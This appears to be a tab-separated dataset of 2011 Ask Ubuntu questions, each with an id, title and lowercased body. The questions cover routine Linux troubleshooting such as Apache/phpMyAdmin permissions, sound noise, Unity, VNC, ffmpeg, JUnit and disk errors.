64183	help with lamp sever	firstly i followed the instructions on the following site to install the lamp server : http : //www.multimediaboom.com/how-to-install-lamp-server-in-ubuntu-11-0410-1010-04/ # comment-48391 step 3 : go to http : //localhost/phpmyadmin this did not work . it came up with a 404 error at first then after running `` sudo ln -s /usr/share/phpmyadmin /var/www '' it came up with a 403 error and said `` forbidden : you do n't have permission to access /phpmyadmin on this server '' . then the last step was to make a simple php file and test that php was working . i could not save the file into /var/www/ so to recap : how do i get around the 403 forbidden error for phpmyadmin ? how do i save / copy / make files in /var/www/ when it is owned by root ? edit : i have managed to save the test.php file into /var/www/ by launching gedit via the gksudo command . when i go to localhost/test.php however it downloads the test.php file instead of running it on the server . apache2 error log file contents : [ tue oct 04 15:30:27 2011 ] [ notice ] apache/2.2.17 ( ubuntu ) configured -- resuming normal operations [ tue oct 04 15:30:30 2011 ] [ notice ] graceful restart requested , doing restart apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername [ tue oct 04 15:30:30 2011 ] [ notice ] apache/2.2.17 ( ubuntu ) configured -- resuming normal operations [ tue oct 04 15:31:46 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 15:32:27 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/phpmyadmin [ tue oct 04 15:32:27 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 15:33:17 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 15:33:17 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:23 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:23 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:25 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:25 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:31 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:31 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:32 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:32 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 16:55:33 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 16:55:52 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 17:06:15 2011 ] [ error ] [ client 127.0.0.1 ] symbolic link not allowed or link target not accessible : /var/www/phpmyadmin [ tue oct 04 17:06:15 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 17:24:34 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 17:24:42 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/php [ tue oct 04 17:24:42 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 17:25:42 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 17:25:42 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 18:31:45 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico [ tue oct 04 19:07:40 2011 ] [ error ] [ client 127.0.0.1 ] file does not exist : /var/www/favicon.ico thanks .
64184	noise problems when playing any sound ( on laptops or when using any sound apps )	i have fresh installed ubuntu 11.04 on my lenovo sl500 . my problem is i have constant noise on my headphone although all sound channels and microphone is muted from alsamixer . any body have same problem and how can i fix this ? my sound card is : olcay @ olcay-thinkpad-sl500-linux : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : conexant analog [ conexant analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : conexant digital [ conexant digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 here is my alsa-info.sh output : http : //www.alsa-project.org/db/ ? f=b99a684b70b6921587e8625c5a5e2270faefe984 here is `` sudo lspci -vvvnn '' output : http : //pastebin.com/r2rzpkj8 answers to questions luis alvarado asked : muting and changing levels in alsamixer changes noise but the main noise does not go away or change . the noise comes continuously and opening sound settings does not stop noise . moving mouse around , pressing keyboard keys and activity on hard drive change noise . i do not have my wireless mouse with me so i can not test it . it is same with touchpad . scrolling up and down in web browser and terminal changes noise . i do not hear noise from internal speaker . it comes only from headphone . unplugging the laptop adapter from socket changes noise level to more lower level but again it is still there . i use a grounded socket . it does not change anything . this is my work computer so i do not use home theater , tv or speakers . this problem also occurs on windows , so this mean it is not software or driver related . it is most likely a hardware error , cable problem or grounding problem . and bounty goes to luis alvarado .
64189	show hidden .htaccess files by default	i was wondering if there is some method to display .htaccess files by default in every folder i create it . is it possible to exclude .htaccess files from the hidden files ? maybe from the terminal
64192	indicators in unity panel wo n't respond	i configured the unity panel to display all the indicators available by changing the value of systray-whitelist to [ 'all ' ] using dconf-editor . now after booting , the indicators wo n't respond until i run unity -- replace command . i have to do this after every boot for the indicators to work properly . is there any way to solve this ?
64193	ubuntu 11.04 netbook edition	i already have 11.04 installed on my acer one netbook but i have some problems with it.its slugish sometimes do they have netbook remix for 11.04 as they had it for 10.04 ?
64196	optimising 11.04 for speed	i 've just upgraded to 11.04 ( after 10.04 ) on my laptop . this went without a glitch , everything just works , so kudos to the ubuntu team . but my laptop is old in dog years . it 's a more than 5 year old travelmate 2420 and when i bought it it was n't the latest and greatest model ... now , i 'm experiencing a desperately slow computer . boot time is way up , and running any program is also much slower than before . i 'm guessing this is because of the graphical effects of unity . is there a way to make ubuntu 11.04 more snappy ? edit : 487.1mib ram , intel celeron m processor 1.60ghz
64197	can i move the /var folder without having to reboot ?	i run a headless ubuntu server from a usb drive , and to minimize writes i want to move the /var folder to a different drive . the problem is that all other drives are encrypted , and become avaliable only well after boot is finished . i could of course just mount /dev/mapped/drive /var but then i 'm sure a lot of processes will get confused as to why their old open file descriptors cant speak to their newly created ones . is there a way to basically restart the whole system without having to reboot or do i have to try to figure out which processes are running and /etc/init.d/* restart them manually ?
64200	will gnome 3 be in 11.10 ?	i want to ask in the upcoming release of ubuntu 11.10 , are they giving gnome 3 ?
64207	enforce outgoing port for a machine inside lan	i 'm running ubuntu server ( natty ) in as a gateway/firewall in front of a private network . i have successfully enabled ip forwarding and nat so the machines behind the firewall can connect to internet ( followed the instructions from https : //help.ubuntu.com/11.04/serverguide/c/firewall.html ) . what i want now , is that a specific ip behind this firewall , whenever wants to connect to an external service to enforced to use only a specific port : 192.168.0.2 ( application ) - > 184.72.64.256 ( gateway , fictive ip ) - > 51.72.64.256 ( service , fictive ip ) so whenever 192.168.0.2 wants to connect to 51.72.64.256 i want it t be enforced by router to use port 10002 ( from port range 10002-12000 ) . 51.72.64.256 allows connections from gateway to ports 10002-12000 . is there a way to create a custom chain and plug it into ufw , so that i will still be able to use ufw in the intended way and be able to dynamically update this chain whenever i add machines behind this firewall .
64208	shell command for outputting absolute path of binary	is there a shell command for outputing absolute path for specified program ? i 'd like to know where executable binary file is .
64212	how do i uninstall ubuntu one on windows 7 ?	just tried ubuntu one ver.2 on windows 7 and got into trouble with syncing . the installer did not make any entry in the control panel install/remove programs . how do i uninstall/remove the files/settings etc . completely ?
64213	how to install/use junit ?	i have installed junit on my ubuntu 11.04 sudo apt-get install junit then created a test file like : import org.junit . * ; public class testbasiclinkedlist { @ test public void testcanadd ( string [ ] args ) { basiclinkedlist < integer > list = new basiclinkedlist ( ) ; list.add ( new basiclistnode < integer > ( 1 ) ) ; asserttrue ( list.size ( ) == 1 ) ; asserttrue ( list.getfirst ( ) .getelement ( ) .equals ( 1 ) ) ; } } then tried running in terminal java org.junit.runner.junitcore testbasiclinkedlist.java got : exception in thread `` main '' java.lang.noclassdeffounderror : org/junit/runner/junitcore caused by : java.lang.classnotfoundexception : org.junit.runner.junitcore at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : org.junit.runner.junitcore . program will exit . how do i use junit ? is there a better shorter way of using it than the long command java org.junit.runner.junitcore testbasiclinkedlist.java ? perhaps something like junit *.tests.java maybe ?
64214	starting byobu with a config file , but getting all the byobu niceties , too ?	when one starts byobu by saying : byobu -c myconfig unfortunately the whole session looks like a bare bone screen session . how can i get the full-fledged byobu interface with the status bar and `` tabs '' for the windows in the session , while at the same time starting byobu with a custom configuration file ? please note : this is not about configuring what 's in $ home/.byobu because the contents of that are independent from what i want to achieve - which is special purpose ( thus the extra configuration file ) . edit : the only `` crutch '' i 've found so far is to interactively enter the screen command : : source /full/path/to/myconfig ... in order to `` source '' ( similar to how it 's done in bash and other shells ) the configuration .
64219	why is ddclient giving me an `` invalid ip '' error when trying to update dynamic dns ?	i am having a really hard time getting ddclient ( which updates opendns with my current ip address ) to work . i have it running as a daemon , but it never succeeds in updating my ip address at opendns . to troubleshoot , i am running ddclient from the command line as follows . ( in these examples , values in square brackets [ ] are stand-ins for the real values for security reasons ) my /etc/ddclient.conf contains : use=web , web=checkip.dyndns.org/ , web-skip='ip address' server=updates.opendns.com protocol=dyndns2 login= [ my login ] password= [ my password ] home when i run : sudo ddclient -daemon=0 -debug -verbose -noquiet i get : warning : file /var/cache/ddclient/ddclient.cache , line 3 : invalid value for keyword 'ip ' = '' ... warning : skipping update of home from < nothing > to [ my real ip ] . warning : last updated < never > but last attempt on tue oct 4 08:38:32 2011 failed . if i rm the cache file , ddclient does work once , but then it fails on subsequent times .
64220	how can i install the older gnome control center in 11.10 ?	is there a way to install the control center used in ubuntu 11.04 on 11.10 . now i have the options to change things under system settings but i would like to have the old `` control center '' back .
64222	how can i create launchers on my desktop ?	in older versions it was easy to create a launcher on my desktop all i had to do is right click on my desktop and select the create launcher option . but on 11.10 the option disappeared from the menu.. how can i get it back ?
64226	what is responsible for mounting disks listed in fstab ?	what script/init process/whatever is responsible for reading fstab and calling mount , during the boot process ?
64241	how do i switch to xubuntu ?	i 'd like to use xubuntu in 11.10 instead of unity , how do i install it and switch to it ?
64244	nautilus crashes when accessing some folders	since the past few days , nautilus has started crashing whenever i access one of the documents , video , pictures , download folder . it does not happen when i access the home folder and other mounted drives . the interesting thing is i do not get any error messages , nautilus simply closes when trying to access these folders . can you please tell what might be the problem and how to rectify ? i have recently installed gnome-documents and sushi , and am on gnome 3.2 with oneric 11.10 . thanks and regards
64246	is there a way to make the sidebar be out permanently ?	i just installed ubuntu 11.04 yesterday and as you may know , the sidebar collapses back when one moves the mouse away . is there a way to make it stay out ? as a side question , will some of fx . firefox get `` stuck '' under the sidebar the way that is now when i move it out ?
64254	cant remote desktop to server	i am trying to vnc into my server . on my actual server , when i type startx , it boots into gnome . it is at this point that my server will allow me to remote desktop into it . my problem is right now my server is not booted into gnome by running startx and just sitting at a command prompt . i am not with it and can not type the startx command . if i ssh into it , and type startx i get the following output : dan @ dvserver : ~ $ startx x : user not authorized to run the x server , aborting . ^cinvalid mit-magic-cookie-1 keyxinit : giving up xinit : unable to connect to x server : connection refused xinit : unexpected signal 2 dan @ dvserver : ~ $ sudo startx [ sudo ] password for dan : fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log and when i try to vnc into it , it fails . is there a way that i cant start my x session via ssh and still connect through vnc ? maybe im jsut going about this remote desktop thing all wrong . also , i am using tightvnc .
64257	login username is not what is showing up in the terminal and chat icon	im using openldap for login authentication , i have a 10.04 server and a 11.04 client . i have 2 users set up so far , mike and alicia . when i log in with alicias name , the chat status icon next to the power button says mike . also when you open up the terminal , it says mike @ alicia-linux instead of alicia @ alicia-linux . if i click on the chat icon ( that says mike ) and click the about me option , it says user name alicia , and gives me all of alicia 's information . i do n't get it ? when i type in getent passwd i have these 2 entries on the bottom . mike : x:1000:10000 : mike gaffney : /home/mike : /bin/bash alicia : x:10000:10000 : alicia transue : /home/alicia : and here is her information from ldap search # alicia , people , midfifty.com dn : uid=alicia , ou=people , dc=midfifty , dc=com objectclass : inetorgperson objectclass : posixaccount objectclass : shadowaccount cn : alicia transue sn : transue uid : alicia uidnumber : 10000 gidnumber : 10000 homedirectory : /home/alicia does mike showing up have something to do with the objectclass ? this was just copied from a tutorial so i dont know if those are the correct settings
64261	need to make a shortcut command using xargs	i always want to kill a process id which listening on port 3000 . so presently i am using , 1.lsof -i tcp:3000 will give output as , command pid user fd type device size/off node name ruby 6697 xxxx 5u ipv4 251982 0t0 tcp *:3000 ( listen ) and i will kill the pid using , 2. kill -9 6697 i want to create a bash program which do this process automatically . i tried using xargs to get pid of the output of first command but failed .
64262	need a tool to compare the contents of two directories	i 'm looking for a tool ( or anything that do the job ) that compare the contains of two folder and show the differences between them . i want the file list and if possible the different contents between files with same path . does anyone now the simpliest way to do that ?
64268	oneiric desktop looks seriously defect after updates	probably a coincidence , but after applying the fix to how to get the proper lightdm theme ? and running the latest batch of updates , my desktop suddenly looked like this after rebooting : funny thing is , it seems to be account specific , as my girlfriend 's account seems unaffected . i ca n't logout because the whole entry is missing on the top right . rebooting does n't solve the issue . system settings ( when run from the launcher ) lacks a whole lot of icons and changeing the theme does n't solve the problem ( only changes the window top bar ) . i 'm going to try the solution in how do i fix my theme ? first , but if that does n't work ( likely , since i seem to have a slightly bigger problem than the one in that question ) i 'd love something else to try ( other than creating a new account ) .
64271	why ca n't i synchronize pictures folder with ubuntu one ?	when i right click the pictures folder , and go to ubuntu one- > synchronize this folder , nothing happens . as this page shows , the option should change to `` stop synchronizing this folder '' , but it does n't . also , if i enter the folder ( with nautilus ) , and click on the top check box synchronize this folder , it keeps loading forever and nothing happens ( my computer is a quadcore , and the connection is more then 1mb , it 's not a computer performance issue ) . am i doing anything wrong to synchronize ? my pictures folder contains 36.8 mb of files .
64275	reconnect at login for davfs2	i have a secure webdav server that i need to connect to . i was unable to connect through the `` connect to server ... '' option in the places menu . i was able to connect through command line by manually mounting the folder with the mount.davfs from the davfs2 package . ~ $ sudo mount.davfs https : //secureserver.com/myfolder localdir please enter the username to authenticate with server https : //secureserver.com/myfolder or hit enter for none . username : andrewredd please enter the password to authenticate user andrewredd with server https : //secureserver.com/myfolder or hit enter for none . password : it successfully connects but how can i automate this so that i can reconnect at login every time .
64279	remaster ubuntu 's application config like pinguy	i notice that many of the applications of the ubuntu remaster , pinguy , sports it 's own unique configuration for the os , most prominent of which is firefox with a lot of preinstalled add-ons . how can i do the same on my personal ubuntu installers ?
64282	ubuntuone for windows does not work - i got `` problem opening the ping_url '' error	when i try to login to existing account i got `` problem opening the ping_url '' error .
64283	custom application icons not displaying	i am working on a package for a custom application and can not get my applications icons to display . here is my desktop file , which is installed in /usr/share/applications : [ desktop entry ] version=1.0 type=application name=map creator icon=ntfmo-map-creator tryexec=/opt/ntfmo/map_creator/bin/map_creator exec=/opt/ntfmo/map_creator/bin/map_creator.sh categories=office ; x-desktop-file-install-version=0.16 i have copied images to the following locations : /usr/share/icons/hicolor/32x32/apps/ntfmo-map-creator.png /usr/share/icons/hicolor/48x48/apps/ntfmo-map-creator.png /usr/share/icons/hicolor/scalable/apps/ntfmo-map-creator.svg i have rebooted , but still nothing . do you have to register the icons or something ? [ edit ] ok , i got it to work by running sudo rm -f /usr/share/icons/*/icon-theme.cache , but that seems a little draconian . is that the `` correct '' solution ? does my package need to run that after it installs ? seems a little much ... .
64284	what does thisisthecountdown.com count down to ?	the new cool page created by ubuntu-adverts team http : //www.thisisthecountdown.com/ displays a nice counter , and an ubuntu logo followed by a short motto . it seems , however , that it 's not counting down to the ubuntu 11.10 oneiric ocelot release . so what 's the time zero , and what is expected to happen when the counter reaches zero ?
64286	intel core i5-2467m running hot on one core while the other keeps cool	i am running an ubuntu 11.10 beta2 wubi installation on my samsung 900x3a notebook . i had to try it with wubi because this darn thing just wo n't boot off usb drives ( even using the port on the right side ) . but this is another story . first thing i noticed was that the fan does n't go into an idle state . it 's always spinning on full power . the system monitor shows an evenly distributed usage of all 4 virtual cores . but what is actually looking very suspiciously to me is the output of lm-sensors : acpitz-virtual-0 adapter : virtual device temp1 : +62.0°c ( crit = +100.0°c ) temp2 : +29.8°c ( crit = +100.0°c ) as you can see , it seems like one core is not getting enough air . or to name another possibility maybe one core is n't ( fully ) used by the system ? on windows 7 i usually get around 55° c to 68° c ( only when the cpu usage is near 100 % ) does anyone have similar problems or maybe even a solution to get the temperatures leveled and therefore to get the fan go idle ? thanks you . cat /proc/cpuinfo
64290	installer stuck at `` ready when you are ''	i had problems with my ubuntu installation , so i tried to reinstall from the cd i had for ubuntu ... .it asks me first if i want to upgrade 11.04 to 11.04 or do a new installation . i selected new and i enter the time zone , and then come to the point where it asks me for the user-id , it does it 's thing and then i get the message ... .ready when you are ... ..but only the back button works , the forward button is greyed out . so , i turned off the computer and started again , this time , trying to upgrade 11.04 to 11.04 and it comes and stops at the exact same point . i have it opened right now by chosing try ubuntu and from there i went in to install ubuntu 11.04 and i am at the window allocate drive space ... . ( i had windows vista also on the previous install ) so there are a few partitions and i do n't know which one to select to do this correct . any help would be greatly appreciated . thanks ! this is what my allocate drive space says currently ... . device type mount point format size used /dev/sda /dev/sda1 ntfs 7669mb 6724mb /dev/sda2 ntfs 101093mb 16170mb /dev/sda7 ext4 84875mb 3563mb /dev/sda8 swap 2128mb 0mb /dev/sda6 swap 2130mb 0mb /dev/sda5 swap 2135mb 0mb and below that i have 5 buttons new partition tableâś addâś change ... . delete revert below that is device for boot loader installation ... ..which one do i choose from below /dev/sda ata toshiba mk2035gs ( 200gb ) /dev/sda1 windows recovery environment ( loader ) /dev/sda2 windows vista ( loader ) /dev/sda7 ubuntu 11.04 ( 11.04 )
64291	should i upgrade kernel packages on ec2 instances ?	on my ec2 server , when i do sudo apt-get update & & sudo apt-get upgrade , i see : the following packages have been kept back : linux-ec2 linux-image-ec2 linux-image-virtual linux-virtual should i go ahead and do sudo apt-get install linux-ec2 linux-image-ec2 linux-image-virtual linux-virtual to force these packages to be upgraded ?
64294	is there an upper limit to ubuntu one storage subscriptions ?	at ubuntu one services it is possible to purchase 20gb of additional storage space for $ 29.99/year . there is also a box which appears to work as a sort of quantity selector . my question is : is there an upper limit to the amount of 20gb subscriptions you can purchase at any one time ?
64296	how do i enable trash functionality on samba shares ?	i have a successful samba server setup but it 's rather annoying that when i delete a file i can only delete it permanently and not move it to the trash . so my question is , how do i enable trash functionality on a samba share ? i 'd prefer to get an explanation on how to do it by cli since this setup is on ubuntu server 11.04 : ) the only article i found regarding this on the web is this tutorial for red hat : http : //www.redhat.com/advice/tips/sambatrash.html please help me out here : )
64300	how do i tag files with custom emblems in nautilus ?	in every previous version of ubuntu , i 'd just right click the file , hit properties , then one of the tabs would let me add all the custom icon tags i 'd like . it seems to be completely missing in oneric , though i can still see the icons on files i 've tagged previously , there 's just no way to change them .
64301	the information could not be retrieved . maybe your internet connection is down ?	i got this error from ubuntu one control panel it could be related to : - i tried ( at least ) tow times upload 3gb file using web interface without success - i create copy of one file from-to sahred folder + remove original file + change name of copy to the same name as original ( copy ; remove ; mv ) screenshots : ( unable to publish ) system : ubuntu 11.04 //edit i forgot about information that ths file which was copy/remove/rename - was removed from web interface before synchronization ( was not synchronized in first time because password for ubuntuone was changed before that ) - i mean : 0 . i removed this file from web interface , and then copy , paste , rename - and then update password - i know it is little complicated - but right now ubuntu one is not working from my compulter - only web interface is working right now .
64303	block anything from certain ip , injected from isp when tethering from phone	my isp injects javascript files - most notabily bmi.js - and certain other unwanted additions to web requests when tethering from my phone . it would be ok if the javascript was useful , but it is programmed terribly - and as a javascript developer , this really annoys me when the injected scripts break my own work ! it looks like it annoys some other people too ... i 'd like to block any activity to the ip address 1.2.3.* . i 've noticed 1.2.3.4 and 1.2.3.8 in use , or if anyone can give me any better solutions , i 'd be happy to try . thanks ! edit i have to agree with george edison with that sounds like a terrible isp . the plot thickens ... while playing around with iptables and the like , i noticed that as soon as i blocked 1.2.3.4 , the script was simply injected from another domain . i blocked that , it moved on to another . in my web browser , i can access the script from any domain ! what the heck is the isp doing here ? for example , these uris all respond with the script : http : //1.2.3.4/bmi-int-js/bmi.js http : //1.2.3.5/bmi-int-js/bmi.js http : //4.3.2.1/bmi-int-js/bmi.js and nauseatingly : http : //scriptinjection-whydoyouexist.com/bmi-int-js/bmi.js http : //google.com/bmi-int-js/bmi.js http : //askubuntu.com/bmi-int-js/bmi.js face palm
64307	unable upload 3gb file using web interface	today i tried ( at least ) two time upload about 3gb file - everythime progress dialog disappear and in status i got information '93 % upload is done ' - no error happen . no file available in ubuntuone . system : windows xp browser : chrome file type : .tar file size : about 3gb
64309	how do i set up gluster in a simple non-clustered configuration ?	i would like to set up glusterfs to replace my use of nfs4 , how can i do that ?
64318	how can i enable silent automatic updates for google chrome ?	installing google chrome causes a third-party software source to be added from which google chrome upgrades can be retrieved : $ cat /etc/apt/sources.list.d/google-chrome.list # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main $ head -n 9 /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_release origin : google , inc. label : google suite : stable codename : stable version : 1.0 date : tue , 04 oct 2011 00:57:43 +0000 architectures : i386 amd64 components : main description : google chrome-linux repository . $ grep '^package : ' /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages package : google-chrome-beta package : google-chrome-stable package : google-chrome-unstable how can i enable unattended upgrades from this repository ?
64325	is there a way to scale icons in the launcher smaller than 32 pixels ?	i am using 11.10 beta and want to give unity another chance ( i was always very fond of xfce ) ... anyway is there a way to scale the icons to a really small size , let 's say ~25 ? ? and can this also be done for unity-2d , i figure the compiz configuration tool wo n't work with unity-2d ?
64327	can not open any pdf file using okular	today i found online saying that okular is a very good document viewer . so i installed it from the software center . after the installation , okular could not open any pdf files . actually it could not open file . it always complained that `` can not find a plug in ... '' and `` could not open ... pdf file '' . i looked up on this site , and found somebody said we should delete the related configuration files under ~/.kde/share/ . but i did n't found those files there . btw , i 'm using the unity desktop .
64329	how to replace openjdk 6 with openjdk 7 ?	surprisingly ( as openjdk 7 was released to general availability about 4 months ago ) ubuntu 11.10 still uses openjdk 6 instead of 7 by default . how do i best fix this ? i 'd prefer to remove openjdk 6 completely and let openjdk 7 to be the default-jdk and default-jre . i do n't want the official oracle tarballs , i want deb repos - the standard ubuntu way .
64331	python/ffmpeg command line issues	i have a problem with running an ffmpeg command from within a python script . when i run the following command from the terminal , i can stream video and audio from my attached webcam ( logitech c310 ) and output to file `` out.avi '' without any errors . ffmpeg -f alsa -i default -itsoffset 00:00:00 -f video4linux2 -s 1280x720 -r 25 -i /dev/video0 out.avi when i run the same command in a python script below , def call_command ( command ) : subprocess.popen ( command.split ( ' ' ) ) call_command ( `` ffmpeg -f alsa -i default -itsoffset 00:00:00 -f video4linux2 -s 1280x720 -r 25 -i /dev/video0 out.avi '' ) it gives me this error : input # 0 , alsa , from 'default ' : duration : n/a , start : 1317762562.695397 , bitrate : n/a stream # 0.0 : audio : pcm_s16le , 44100 hz , 1 channels , s16 , 705 kb/s [ video4linux2 @ 0x165eb10 ] can not find a proper format for codec_id 0 , pix_fmt -1 . /dev/video0 : input/output error could anyone shed some light on what could be going on here ? i 've tried using os.system ( ) as well as subprocess.call ( ) and it gives me the same errors . i 'm not sure where to start on what could be going wrong here . i tried searching for the `` video4linux2 can not find a proper format for codec_id 0 , pix_fmt -1 '' error , but could n't find anything consistent .
64333	how to efficiently send text entered on the command line to the system clipboard without using the mouse ?	say i 've typed the following long command into the command line $ some very long command that i want to copy to the clipboard how can i get this onto the system clipboard efficiently ? i 'm using gnome terminal 2.23.1 . i know that i can get the mouse and highlight it and copy it , but i want a general keyboard solution . it would also be good if it generalised to multiple command-line programs . for example , in bash in vi mode , i can press v and then edit the command in vim , and thus use vim 's copy to clipboard features , but this does n't work when using r on the command-line . it 's also a bit slow . i 'd like it if in vi-mode , i could press yy and copy the contents of the line to the system clipboard , but this does n't seem to work . furthermore any yanking commands do n't seem to copy contents to the system clipboard ; they appear to only copy to a buffer used by bash . update : after posting i found this similar question on so this promising discussion of modifications to readline
64334	gpointing-device-settings lost on reboot	i 've been using gpointing-device-settings to enable both two-finger and edge scrolling on my trackpad , but it seems to not `` remember '' after reboot . the settings are still `` ticked '' in gpointing-device-settings but two-finger scrolling does n't work until i uncheck and recheck the tickboxes for two-finger scrolling . how can i get ubuntu to remember after reboot that i want both two-finger and edge scrolling without having to open gpointing-device-settings each time ?
64335	synchronize calendar-evolution between computers	how do i sync calendar-evolution between laptop ( ubuntu 10-10 ) and desktop ( ubuntu 11-04 ) ? information for new ubuntu one users provided a warning and faq link , but the link is broken .
64336	i installed wingpanel on elementary ( jupiter ) and its opening the folder /usr/share/applications	i installed wingpanel and when i click on 'apps ' , it opens the /usr/share/applications folder what am i missing ? is this the expected behavior ? should n't it open the launcher ? thanks in advance
64340	ctl+f not opening the find dialog	this is a bit of an irritating problem that i 've been having with ubuntu 11.04 . hitting ctl+f is supposed to open up the find dialog in the currently open program , but instead it is opening up what looks like an xterm window ( see screenshot below ) . i took a look in the keyboard shortcuts window , but i ca n't seem to find the solution in there . i would greatly appreciate any help !
64341	integrating source-compiled package into ubuntu	for performance reasons , i compiled gsl with icc ( intel c compiler ) . i ran ./configure with some flags , make , make check and sudo checkinstall . i had to remove libgsl0ldbl , which is used by a number of packages ( bogofilter bogofilter-bdb ink-generator inkscape libgsl0ldbl octave-gsl octave-statistics octave-vrml pyxplot pyxplot-doc qtiplot ) . i had to remove these packages , run checkinstall to install gsl from source . then when i tried to install the packages back , they wanted to erase my version of gsl and install the pre-compiled one . is there any way to make those packages use the source-compiled version of gsl ?
64342	dell xps m1530 fans wont turn off while runnning ubuntu	my dell xps m1530 laptops fans run at full blast constantly while running ubuntu natty 11.04 . i have installed several programs that claim to correct this problem but none have been successful . anybody have a solution to this ?
64343	what are my options for 4-or-more-input audio recording ?	what are my options for 4-channel-or-more audio input devices in ubuntu ( or linux in general ) ? i could deal with 16-bit input , but 32-bit is better , especially considering the amount of post-processing i tend to do .
64351	how to match ata4.00 to the apropriate /dev/sdx or actual physical disk ?	getting stuff like this in the logs : oct 2 22:11:21 jupiter kernel : [ 439646.093111 ] ata4.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 oct 2 22:11:21 jupiter kernel : [ 439646.093144 ] ata4.00 : bmdma stat 0x6 oct 2 22:11:21 jupiter kernel : [ 439646.093176 ] ata4.00 : failed command : write dma ext oct 2 22:11:21 jupiter kernel : [ 439646.093206 ] ata4.00 : cmd 35/00:98:00:0d : ff/00:02:42:00:00/e0 tag 0 dma 339968 out oct 2 22:11:21 jupiter kernel : [ 439646.093282 ] ata4.00 : status : { drdy err } oct 2 22:11:21 jupiter kernel : [ 439646.093306 ] ata4.00 : error : { icrc abrt } oct 2 22:11:21 jupiter kernel : [ 439646.093353 ] ata4 : soft resetting link oct 2 22:11:21 jupiter kernel : [ 439646.265242 ] ata4.00 : configured for udma/133 oct 2 22:11:21 jupiter kernel : [ 439646.265268 ] ata4 : eh complete now i wonder which disk to replace . but i ca n't find any clear mapping between `` atax.yz '' and /dev/disk/ entries .
64352	how do i enable firefox sync ?	firefox sync is a utility for syncing history , bookmarks , tabs and passwords between devices ( computers ) built in to firefox 4 and later . how do i enable it ?
64357	unable to install ubuntu desktop	i am not able to install ubuntu . i am getting the following error , uhhuh . nmi received for unknown reason a1 on cpu 0 . you have some hardware problem , likely on the pci bus . dazed and confused , but trying to continue . how to solve this issue ? note : i am installing ubuntu 10.10 . i have changed the ubuntu iso image and version also , but still i am facing the same issue . system specification : dell optiplex - 380 ram : 1 gb processor : dual core @ 3.20 ghz harddisk : 250 gb i am not seeing any option to disable smp in bios .
